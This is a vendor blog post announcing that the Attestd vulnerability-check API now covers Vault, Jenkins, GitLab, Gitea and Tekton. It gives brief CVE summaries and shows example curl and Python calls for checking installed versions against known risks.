Expanding Coverage: Security Tooling and CI/CD Infrastructure
Expanding Coverage: Security Tooling and CI/CD Infrastructure#
Five new products are live on Attestd.
Security Tooling: HashiCorp Vault
CI/CD Infrastructure: Jenkins, GitLab, Gitea, Tekton Pipelines
Why this batch matters#
Vault, Jenkins, GitLab, Gitea, and Tekton all sit at the same intersection: secrets, source code, and deployment pipelines. A compromised instance in any of these tools typically gives an attacker lateral movement across the entire infrastructure stack, not just the tool itself. The credentials stored in Vault fund further attacks. The pipelines running in Jenkins and GitLab build and ship everything else. The source code in GitLab and Gitea is the target and the vector simultaneously.
Two CVEs in this batch are on the CISA KEV list and have been actively weaponised in real incidents. They are the right place to start.
Jenkins — CVE-2024-23897 (CISA KEV, CVSS 9.8)#
CVE-2024-23897 is an arbitrary file read vulnerability in the Jenkins CLI parser. An unauthenticated attacker can read arbitrary files from the Jenkins controller file system, including secrets, credentials, and SSH keys. In practice, successful exploitation has led to full remote code execution on unpatched instances by chaining the file read with other weaknesses.
Jenkins 2.442 and LTS 2.426.3 patch this. Any Jenkins instance below that threshold is running a CISA KEV listed vulnerability that has been exploited in the wild.
curl "https://api.attestd.io/v1/check?product=jenkins&version=2.441" \
-H "Authorization: Bearer YOUR_API_KEY"
Returns riskState: "critical".
GitLab — CVE-2023-7028 and CVE-2024-45409#
CVE-2023-7028 (CVSS 10.0) is an account takeover vulnerability affecting GitLab CE and EE versions 16.1 through 16.7.1. An attacker can trigger a password reset email to be sent to an attacker-controlled unverified email address, bypassing the email verification requirement. The result is full account takeover without any prior access. Patched in 16.7.2, but the 16.7.x line carries additional CVEs that keep the risk state elevated.
CVE-2024-45409 (CVSS 10.0) is a SAML authentication bypass in the ruby-saml library used by GitLab. An unauthenticated attacker can forge a SAML response and sign in as any user, including administrators. No credentials required.
curl "https://api.attestd.io/v1/check?product=gitlab&version=16.7.0" \
-H "Authorization: Bearer YOUR_API_KEY"
Returns riskState: "critical".
HashiCorp Vault#
Vault is the secrets management layer for most modern infrastructure. CVEs here have outsized consequences because Vault credentials fund lateral movement everywhere else.
Two CVEs of note in the current data:
CVE-2023-0620 is a SQL injection vulnerability via the database secrets engine. An authenticated operator with specific permissions can inject SQL that the engine executes. CVSS 7.2.
CVE-2024-2660 is a TLS certificate validation bypass affecting Vault Agent. Under certain configurations, the agent does not correctly validate the server certificate, enabling man-in-the-middle attacks against the Vault-to-agent channel. CVSS 6.4.
The 1.12.x line carries higher risk than the current 1.17.x line:
# Older 1.12.x line
curl "https://api.attestd.io/v1/check?product=hashicorp_vault&version=1.12.0" \
-H "Authorization: Bearer YOUR_API_KEY"
# → riskState: "high"
# Current 1.17.x line
curl "https://api.attestd.io/v1/check?product=hashicorp_vault&version=1.17.0" \
-H "Authorization: Bearer YOUR_API_KEY"
# → riskState: "none"
Gitea#
Gitea is a self-hosted Git service widely used as a GitHub alternative in private infrastructure and air-gapped environments. Two CVEs in the current data: CVE-2022-1058, an open redirect via the login form (CVSS 6.1), and CVE-2023-22464, a cross-site scripting vulnerability via issue comments.
The risk level is lower than Jenkins and GitLab, but Gitea instances often run with broader internal access than their exposure suggests. Source code and CI webhook access in one place.
Tekton Pipelines#
Tekton is the Kubernetes-native CI/CD framework underlying several major pipeline platforms. The current NVD data under linuxfoundation:tekton_pipelines includes a pipeline step injection finding through untrusted workspace content. Tekton's attack surface is the pipeline definition itself: if an attacker can influence workspace content that pipeline steps consume, they can inject arbitrary commands into the build.
Checking your CI/CD stack#
All five products are available via the standard /v1/check endpoint. The slugs are hashicorp_vault, jenkins, gitlab, gitea, and tekton.
from attestd import Client
client = Client(api_key="YOUR_API_KEY")
cicd_stack = {
"jenkins": "2.441",
"gitlab": "16.7.0",
"hashicorp_vault": "1.12.0",
"gitea": "1.19.0",
"tekton": "0.50.0",
}
for product, version in cicd_stack.items():
result = client.check(product, version)
if result.risk_state in ("critical", "high", "elevated"):
print(f"{product} {version}: {result.risk_state}")
if result.fixed_version:
print(f" Fix: {result.fixed_version}")
The common thread#
pip audit and npm audit scan Python and JavaScript dependencies. They do not reach Vault, Jenkins, GitLab, Gitea, or Tekton. These products are infrastructure. They do not appear in a requirements.txt or a package.json. A pipeline can gate on risk_state !== "none" without the team needing to track NVD advisories for each tool manually.
CVE-2024-23897 (Jenkins) and CVE-2023-7028 (GitLab) are both on the CISA KEV list and have been used in real attacks. Both would have returned riskState: "critical" on the affected versions since Attestd added coverage.
Full product reference at attestd.io/docs/products.
Get an API key at api.attestd.io/portal/login. Free tier, 1,000 calls a month, no credit card required.